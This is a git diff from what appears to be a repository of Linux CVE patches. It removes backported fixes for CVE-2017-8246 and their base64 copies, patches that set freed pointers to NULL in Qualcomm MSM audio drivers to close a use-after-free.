-@@ -478,6 +478,7 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream)
- 
- 	pr_debug("%s\n", __func__);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-index 0612318..289049c 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -544,6 +544,8 @@ static int msm_pcm_close(struct snd_pcm_substream *substream)
- 					 SNDRV_PCM_STREAM_PLAYBACK :
- 					 SNDRV_PCM_STREAM_CAPTURE);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
-+
- 	return 0;
- }
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-index 07f82952..b9a1d57 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -755,6 +755,8 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream)
- 	msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- 						SNDRV_PCM_STREAM_PLAYBACK);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
-+
- 	return 0;
- }
- 
-@@ -860,6 +862,7 @@ static int msm_pcm_capture_close(struct snd_pcm_substream *substream)
- 	msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- 		SNDRV_PCM_STREAM_CAPTURE);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch
deleted file mode 100644
index 6f911bbb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From ac8b4b8f6976c6f63704c2f1e3dc464bfa6a5256 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 24 Feb 2017 16:13:20 +0800
-Subject: [PATCH] BACKPORT: ASoC: msm: qdsp6v2: set pointer to NULL after free.
-
-Pointer after kfree is not sanitized.
-Set pointer to NULL.
-
-CRs-Fixed: 2008031
-Change-Id: Ia59a57fcd142a6ed18d168992b8da4019314afa4
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
-Signed-off-by: Bikshapathi Kothapeta <bkotha@codeaurora.org>
----
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-index 3284380..f4a9a4d 100644
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-@@ -391,6 +391,7 @@
- 	SNDRV_PCM_STREAM_PLAYBACK);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	compr->prtd = NULL;
- 	return 0;
- }
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-multi-ch-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-multi-ch-pcm-q6-v2.c
-index 98401d9..f93029c 100644
---- a/sound/soc/msm/qdsp6v2/msm-multi-ch-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-multi-ch-pcm-q6-v2.c
-@@ -503,6 +503,7 @@
- 	multi_ch_pcm_audio.prtd = NULL;
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- 
-@@ -595,6 +596,7 @@
- 	SNDRV_PCM_STREAM_CAPTURE);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-index b6ecaa6..68a6b3d 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-@@ -396,6 +396,7 @@
- 	mutex_unlock(&prtd->lock);
- 	prtd->prepared--;
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- static int msm_afe_prepare(struct snd_pcm_substream *substream)
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-index a6c8f16..9c575a5 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-@@ -391,6 +391,7 @@
- 	pr_debug("%s\n", __func__);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-index 57ccea1..f5846ca 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-@@ -446,6 +446,7 @@
- 	SNDRV_PCM_STREAM_PLAYBACK);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- 
-@@ -538,6 +539,7 @@
- 	SNDRV_PCM_STREAM_CAPTURE);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch.base64
deleted file mode 100644
index 75310d3e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBhYzhiNGI4ZjY5NzZjNmY2MzcwNGMyZjFlM2RjNDY0YmZhNmE1MjU2IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBYaWFvanVuIFNhbmcgPHhzYW5nQGNvZGVhdXJvcmEub3JnPgpEYXRlOiBGcmksIDI0IEZlYiAyMDE3IDE2OjEzOjIwICswODAwClN1YmplY3Q6IFtQQVRDSF0gQkFDS1BPUlQ6IEFTb0M6IG1zbTogcWRzcDZ2Mjogc2V0IHBvaW50ZXIgdG8gTlVMTCBhZnRlciBmcmVlLgoKUG9pbnRlciBhZnRlciBrZnJlZSBpcyBub3Qgc2FuaXRpemVkLgpTZXQgcG9pbnRlciB0byBOVUxMLgoKQ1JzLUZpeGVkOiAyMDA4MDMxCkNoYW5nZS1JZDogSWE1OWE1N2ZjZDE0MmE2ZWQxOGQxNjg5OTJiOGRhNDAxOTMxNGFmYTQKU2lnbmVkLW9mZi1ieTogWGlhb2p1biBTYW5nIDx4c2FuZ0Bjb2RlYXVyb3JhLm9yZz4KU2lnbmVkLW9mZi1ieTogQmlrc2hhcGF0aGkgS290aGFwZXRhIDxia290aGFAY29kZWF1cm9yYS5vcmc+Ci0tLQoKZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9tc20tY29tcHItcTYtdjIuYyBiL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9tc20tY29tcHItcTYtdjIuYwppbmRleCAzMjg0MzgwLi5mNGE5YTRkIDEwMDY0NAotLS0gYS9zb3VuZC9zb2MvbXNtL3Fkc3A2djIvbXNtLWNvbXByLXE2LXYyLmMKKysrIGIvc291bmQvc29jL21zbS9xZHNwNnYyL21zbS1jb21wci1xNi12Mi5jCkBAIC0zOTEsNiArMzkxLDcgQEAKIAlTTkRSVl9QQ01fU1RSRUFNX1BMQVlCQUNLKTsKIAlxNmFzbV9hdWRpb19jbGllbnRfZnJlZShwcnRkLT5hdWRpb19jbGllbnQpOwogCWtmcmVlKHBydGQpOworCWNvbXByLT5wcnRkID0gTlVMTDsKIAlyZXR1cm4gMDsKIH0KIApkaWZmIC0tZ2l0IGEvc291bmQvc29jL21zbS9xZHNwNnYyL21zbS1tdWx0aS1jaC1wY20tcTYtdjIuYyBiL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9tc20tbXVsdGktY2gtcGNtLXE2LXYyLmMKaW5kZXggOTg0MDFkOS4uZjkzMDI5YyAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9xZHNwNnYyL21zbS1tdWx0aS1jaC1wY20tcTYtdjIuYworKysgYi9zb3VuZC9zb2MvbXNtL3Fkc3A2djIvbXNtLW11bHRpLWNoLXBjbS1xNi12Mi5jCkBAIC01MDMsNiArNTAzLDcgQEAKIAltdWx0aV9jaF9wY21fYXVkaW8ucHJ0ZCA9IE5VTEw7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCXJldHVybiAwOwogfQogCkBAIC01OTUsNiArNTk2LDcgQEAKIAlTTkRSVl9QQ01fU1RSRUFNX0NBUFRVUkUpOwogCXE2YXNtX2F1ZGlvX2NsaWVudF9mcmVlKHBydGQtPmF1ZGlvX2NsaWVudCk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAogCXJldHVybiAwOwogfQpkaWZmIC0tZ2l0IGEvc291bmQvc29jL21zbS9xZHNwNnYyL21zbS1wY20tYWZlLXYyLmMgYi9zb3VuZC9zb2MvbXNtL3Fkc3A2djIvbXNtLXBjbS1hZmUtdjIuYwppbmRleCBiNmVjYWE2Li42OGE2YjNkIDEwMDY0NAotLS0gYS9zb3VuZC9zb2MvbXNtL3Fkc3A2djIvbXNtLXBjbS1hZmUtdjIuYworKysgYi9zb3VuZC9zb2MvbXNtL3Fkc3A2djIvbXNtLXBjbS1hZmUtdjIuYwpAQCAtMzk2LDYgKzM5Niw3IEBACiAJbXV0ZXhfdW5sb2NrKCZwcnRkLT5sb2NrKTsKIAlwcnRkLT5wcmVwYXJlZC0tOwogCWtmcmVlKHBydGQpOworCXJ1bnRpbWUtPnByaXZhdGVfZGF0YSA9IE5VTEw7CiAJcmV0dXJuIDA7CiB9CiBzdGF0aWMgaW50IG1zbV9hZmVfcHJlcGFyZShzdHJ1Y3Qgc25kX3BjbV9zdWJzdHJlYW0gKnN1YnN0cmVhbSkKZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9tc20tcGNtLWxwYS12Mi5jIGIvc291bmQvc29jL21zbS9xZHNwNnYyL21zbS1wY20tbHBhLXYyLmMKaW5kZXggYTZjOGYxNi4uOWM1NzVhNSAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9xZHNwNnYyL21zbS1wY20tbHBhLXYyLmMKKysrIGIvc291bmQvc29jL21zbS9xZHNwNnYyL21zbS1wY20tbHBhLXYyLmMKQEAgLTM5MSw2ICszOTEsNyBAQAogCXByX2RlYnVnKCIlc1xuIiwgX19mdW5jX18pOwogCXE2YXNtX2F1ZGlvX2NsaWVudF9mcmVlKHBydGQtPmF1ZGlvX2NsaWVudCk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAogCXJldHVybiAwOwogfQpkaWZmIC0tZ2l0IGEvc291bmQvc29jL21zbS9xZHNwNnYyL21zbS1wY20tcTYtdjIuYyBiL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9tc20tcGNtLXE2LXYyLmMKaW5kZXggNTdjY2VhMS4uZjU4NDZjYSAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9xZHNwNnYyL21zbS1wY20tcTYtdjIuYworKysgYi9zb3VuZC9zb2MvbXNtL3Fkc3A2djIvbXNtLXBjbS1xNi12Mi5jCkBAIC00NDYsNiArNDQ2LDcgQEAKIAlTTkRSVl9QQ01fU1RSRUFNX1BMQVlCQUNLKTsKIAlxNmFzbV9hdWRpb19jbGllbnRfZnJlZShwcnRkLT5hdWRpb19jbGllbnQpOwogCWtmcmVlKHBydGQpOworCXJ1bnRpbWUtPnByaXZhdGVfZGF0YSA9IE5VTEw7CiAJcmV0dXJuIDA7CiB9CiAKQEAgLTUzOCw2ICs1MzksNyBAQAogCVNORFJWX1BDTV9TVFJFQU1fQ0FQVFVSRSk7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCiAJcmV0dXJuIDA7CiB9Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch
deleted file mode 100644
index 112437e7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch
+++ /dev/null
@@ -1,162 +0,0 @@
-From 5b3fcb8c073ea1762744eeb74d2e8301a8728d7b Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 24 Feb 2017 16:13:20 +0800
-Subject: [PATCH] BACKPORT: ASoC: msm: qdsp6: set pointer to NULL after free.
-
-Pointer after kfree is not sanitized.
-Set pointer to NULL.
-
-CRs-Fixed: 2008031
-Change-Id: I765a59a2059ba7a0fc16f70a1a8b92f57297a907
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
-Signed-off-by: Bikshapathi Kothapeta <bkotha@codeaurora.org>
----
-
-diff --git a/sound/soc/msm/msm-lowlatency-pcm-q6.c b/sound/soc/msm/msm-lowlatency-pcm-q6.c
-index ad7ae1f..0f323c4 100644
---- a/sound/soc/msm/msm-lowlatency-pcm-q6.c
-+++ b/sound/soc/msm/msm-lowlatency-pcm-q6.c
-@@ -504,6 +504,7 @@
- 			SNDRV_PCM_STREAM_PLAYBACK);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- 
-@@ -596,6 +597,7 @@
- 			SNDRV_PCM_STREAM_CAPTURE);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/msm-multi-ch-pcm-q6.c b/sound/soc/msm/msm-multi-ch-pcm-q6.c
-index 999683e..59072ec 100644
---- a/sound/soc/msm/msm-multi-ch-pcm-q6.c
-+++ b/sound/soc/msm/msm-multi-ch-pcm-q6.c
-@@ -576,6 +576,7 @@
- 	multi_ch_pcm_audio.prtd = NULL;
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- 
-@@ -668,6 +669,7 @@
- 	SNDRV_PCM_STREAM_CAPTURE);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/msm-pcm-afe.c b/sound/soc/msm/msm-pcm-afe.c
-index 66043d1..a93d58b 100644
---- a/sound/soc/msm/msm-pcm-afe.c
-+++ b/sound/soc/msm/msm-pcm-afe.c
-@@ -326,6 +326,7 @@
- 		pr_debug("%s: Could not allocate memory\n", __func__);
- 		mutex_unlock(&prtd->lock);
- 		kfree(prtd);
-+		runtime->private_data = NULL;
- 		return -ENOMEM;
- 	}
- 	hrtimer_init(&prtd->hrt, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
-@@ -409,6 +410,7 @@
- 	mutex_unlock(&prtd->lock);
- 	prtd->prepared--;
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- static int msm_afe_prepare(struct snd_pcm_substream *substream)
-diff --git a/sound/soc/msm/msm-pcm-q6.c b/sound/soc/msm/msm-pcm-q6.c
-index 16e1415..da696d0 100644
---- a/sound/soc/msm/msm-pcm-q6.c
-+++ b/sound/soc/msm/msm-pcm-q6.c
-@@ -509,6 +509,7 @@
- 			SNDRV_PCM_STREAM_PLAYBACK);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- 
-@@ -604,6 +605,7 @@
- 	msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- 		SNDRV_PCM_STREAM_CAPTURE);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/msm7k-pcm.c b/sound/soc/msm/msm7k-pcm.c
-index a9193a2..50983a0 100644
---- a/sound/soc/msm/msm7k-pcm.c
-+++ b/sound/soc/msm/msm7k-pcm.c
-@@ -393,6 +393,7 @@
- 	msm_adsp_put(prtd->audrec);
- 	msm_adsp_put(prtd->audpre);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-@@ -449,6 +450,7 @@
- 
-  out:
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return ret;
- }
- 
-@@ -492,6 +494,7 @@
- 	alsa_audio_disable(prtd);
- 	audmgr_close(&prtd->audmgr);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/msm7kv2-pcm.c b/sound/soc/msm/msm7kv2-pcm.c
-index 2b7a438..252e1f0 100644
---- a/sound/soc/msm/msm7kv2-pcm.c
-+++ b/sound/soc/msm/msm7kv2-pcm.c
-@@ -520,6 +520,7 @@
- 	alsa_audio_disable(prtd);
- 	auddev_unregister_evt_listner(AUDDEV_CLNT_DEC, prtd->session_id);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-@@ -574,6 +575,7 @@
- 	audpreproc_aenc_free(prtd->session_id);
- 	msm_adsp_put(prtd->audrec);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- 
-diff --git a/sound/soc/msm/msm8x60-pcm.c b/sound/soc/msm/msm8x60-pcm.c
-index 7993435..bfbea5c 100644
---- a/sound/soc/msm/msm8x60-pcm.c
-+++ b/sound/soc/msm/msm8x60-pcm.c
-@@ -534,6 +534,7 @@
- 	msm_clear_session_id(prtd->session_id);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-@@ -627,6 +628,7 @@
- 	msm_clear_session_id(prtd->session_id);
- 	q6asm_audio_client_free(prtd->audio_client);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch.base64
deleted file mode 100644
index 961efb82..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/3.4/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA1YjNmY2I4YzA3M2VhMTc2Mjc0NGVlYjc0ZDJlODMwMWE4NzI4ZDdiIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBYaWFvanVuIFNhbmcgPHhzYW5nQGNvZGVhdXJvcmEub3JnPgpEYXRlOiBGcmksIDI0IEZlYiAyMDE3IDE2OjEzOjIwICswODAwClN1YmplY3Q6IFtQQVRDSF0gQkFDS1BPUlQ6IEFTb0M6IG1zbTogcWRzcDY6IHNldCBwb2ludGVyIHRvIE5VTEwgYWZ0ZXIgZnJlZS4KClBvaW50ZXIgYWZ0ZXIga2ZyZWUgaXMgbm90IHNhbml0aXplZC4KU2V0IHBvaW50ZXIgdG8gTlVMTC4KCkNScy1GaXhlZDogMjAwODAzMQpDaGFuZ2UtSWQ6IEk3NjVhNTlhMjA1OWJhN2EwZmMxNmY3MGExYThiOTJmNTcyOTdhOTA3ClNpZ25lZC1vZmYtYnk6IFhpYW9qdW4gU2FuZyA8eHNhbmdAY29kZWF1cm9yYS5vcmc+ClNpZ25lZC1vZmYtYnk6IEJpa3NoYXBhdGhpIEtvdGhhcGV0YSA8YmtvdGhhQGNvZGVhdXJvcmEub3JnPgotLS0KCmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbS1sb3dsYXRlbmN5LXBjbS1xNi5jIGIvc291bmQvc29jL21zbS9tc20tbG93bGF0ZW5jeS1wY20tcTYuYwppbmRleCBhZDdhZTFmLi4wZjMyM2M0IDEwMDY0NAotLS0gYS9zb3VuZC9zb2MvbXNtL21zbS1sb3dsYXRlbmN5LXBjbS1xNi5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtLWxvd2xhdGVuY3ktcGNtLXE2LmMKQEAgLTUwNCw2ICs1MDQsNyBAQAogCQkJU05EUlZfUENNX1NUUkVBTV9QTEFZQkFDSyk7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCXJldHVybiAwOwogfQogCkBAIC01OTYsNiArNTk3LDcgQEAKIAkJCVNORFJWX1BDTV9TVFJFQU1fQ0FQVFVSRSk7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCiAJcmV0dXJuIDA7CiB9CmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbS1tdWx0aS1jaC1wY20tcTYuYyBiL3NvdW5kL3NvYy9tc20vbXNtLW11bHRpLWNoLXBjbS1xNi5jCmluZGV4IDk5OTY4M2UuLjU5MDcyZWMgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9tc20vbXNtLW11bHRpLWNoLXBjbS1xNi5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtLW11bHRpLWNoLXBjbS1xNi5jCkBAIC01NzYsNiArNTc2LDcgQEAKIAltdWx0aV9jaF9wY21fYXVkaW8ucHJ0ZCA9IE5VTEw7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCXJldHVybiAwOwogfQogCkBAIC02NjgsNiArNjY5LDcgQEAKIAlTTkRSVl9QQ01fU1RSRUFNX0NBUFRVUkUpOwogCXE2YXNtX2F1ZGlvX2NsaWVudF9mcmVlKHBydGQtPmF1ZGlvX2NsaWVudCk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAogCXJldHVybiAwOwogfQpkaWZmIC0tZ2l0IGEvc291bmQvc29jL21zbS9tc20tcGNtLWFmZS5jIGIvc291bmQvc29jL21zbS9tc20tcGNtLWFmZS5jCmluZGV4IDY2MDQzZDEuLmE5M2Q1OGIgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9tc20vbXNtLXBjbS1hZmUuYworKysgYi9zb3VuZC9zb2MvbXNtL21zbS1wY20tYWZlLmMKQEAgLTMyNiw2ICszMjYsNyBAQAogCQlwcl9kZWJ1ZygiJXM6IENvdWxkIG5vdCBhbGxvY2F0ZSBtZW1vcnlcbiIsIF9fZnVuY19fKTsKIAkJbXV0ZXhfdW5sb2NrKCZwcnRkLT5sb2NrKTsKIAkJa2ZyZWUocHJ0ZCk7CisJCXJ1bnRpbWUtPnByaXZhdGVfZGF0YSA9IE5VTEw7CiAJCXJldHVybiAtRU5PTUVNOwogCX0KIAlocnRpbWVyX2luaXQoJnBydGQtPmhydCwgQ0xPQ0tfTU9OT1RPTklDLCBIUlRJTUVSX01PREVfUkVMKTsKQEAgLTQwOSw2ICs0MTAsNyBAQAogCW11dGV4X3VubG9jaygmcHJ0ZC0+bG9jayk7CiAJcHJ0ZC0+cHJlcGFyZWQtLTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCXJldHVybiAwOwogfQogc3RhdGljIGludCBtc21fYWZlX3ByZXBhcmUoc3RydWN0IHNuZF9wY21fc3Vic3RyZWFtICpzdWJzdHJlYW0pCmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbS1wY20tcTYuYyBiL3NvdW5kL3NvYy9tc20vbXNtLXBjbS1xNi5jCmluZGV4IDE2ZTE0MTUuLmRhNjk2ZDAgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9tc20vbXNtLXBjbS1xNi5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtLXBjbS1xNi5jCkBAIC01MDksNiArNTA5LDcgQEAKIAkJCVNORFJWX1BDTV9TVFJFQU1fUExBWUJBQ0spOwogCXE2YXNtX2F1ZGlvX2NsaWVudF9mcmVlKHBydGQtPmF1ZGlvX2NsaWVudCk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAlyZXR1cm4gMDsKIH0KIApAQCAtNjA0LDYgKzYwNSw3IEBACiAJbXNtX3BjbV9yb3V0aW5nX2RlcmVnX3BoeV9zdHJlYW0oc29jX3BydGQtPmRhaV9saW5rLT5iZV9pZCwKIAkJU05EUlZfUENNX1NUUkVBTV9DQVBUVVJFKTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCiAJcmV0dXJuIDA7CiB9CmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbTdrLXBjbS5jIGIvc291bmQvc29jL21zbS9tc203ay1wY20uYwppbmRleCBhOTE5M2EyLi41MDk4M2EwIDEwMDY0NAotLS0gYS9zb3VuZC9zb2MvbXNtL21zbTdrLXBjbS5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtN2stcGNtLmMKQEAgLTM5Myw2ICszOTMsNyBAQAogCW1zbV9hZHNwX3B1dChwcnRkLT5hdWRyZWMpOwogCW1zbV9hZHNwX3B1dChwcnRkLT5hdWRwcmUpOwogCWtmcmVlKHBydGQpOworCXJ1bnRpbWUtPnByaXZhdGVfZGF0YSA9IE5VTEw7CiAKIAlyZXR1cm4gMDsKIH0KQEAgLTQ0OSw2ICs0NTAsNyBAQAogCiAgb3V0OgogCWtmcmVlKHBydGQpOworCXJ1bnRpbWUtPnByaXZhdGVfZGF0YSA9IE5VTEw7CiAJcmV0dXJuIHJldDsKIH0KIApAQCAtNDkyLDYgKzQ5NCw3IEBACiAJYWxzYV9hdWRpb19kaXNhYmxlKHBydGQpOwogCWF1ZG1ncl9jbG9zZSgmcHJ0ZC0+YXVkbWdyKTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCiAJcmV0dXJuIDA7CiB9CmRpZmYgLS1naXQgYS9zb3VuZC9zb2MvbXNtL21zbTdrdjItcGNtLmMgYi9zb3VuZC9zb2MvbXNtL21zbTdrdjItcGNtLmMKaW5kZXggMmI3YTQzOC4uMjUyZTFmMCAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9tc203a3YyLXBjbS5jCisrKyBiL3NvdW5kL3NvYy9tc20vbXNtN2t2Mi1wY20uYwpAQCAtNTIwLDYgKzUyMCw3IEBACiAJYWxzYV9hdWRpb19kaXNhYmxlKHBydGQpOwogCWF1ZGRldl91bnJlZ2lzdGVyX2V2dF9saXN0bmVyKEFVRERFVl9DTE5UX0RFQywgcHJ0ZC0+c2Vzc2lvbl9pZCk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAogCXJldHVybiAwOwogfQpAQCAtNTc0LDYgKzU3NSw3IEBACiAJYXVkcHJlcHJvY19hZW5jX2ZyZWUocHJ0ZC0+c2Vzc2lvbl9pZCk7CiAJbXNtX2Fkc3BfcHV0KHBydGQtPmF1ZHJlYyk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAlyZXR1cm4gMDsKIH0KIApkaWZmIC0tZ2l0IGEvc291bmQvc29jL21zbS9tc204eDYwLXBjbS5jIGIvc291bmQvc29jL21zbS9tc204eDYwLXBjbS5jCmluZGV4IDc5OTM0MzUuLmJmYmVhNWMgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9tc20vbXNtOHg2MC1wY20uYworKysgYi9zb3VuZC9zb2MvbXNt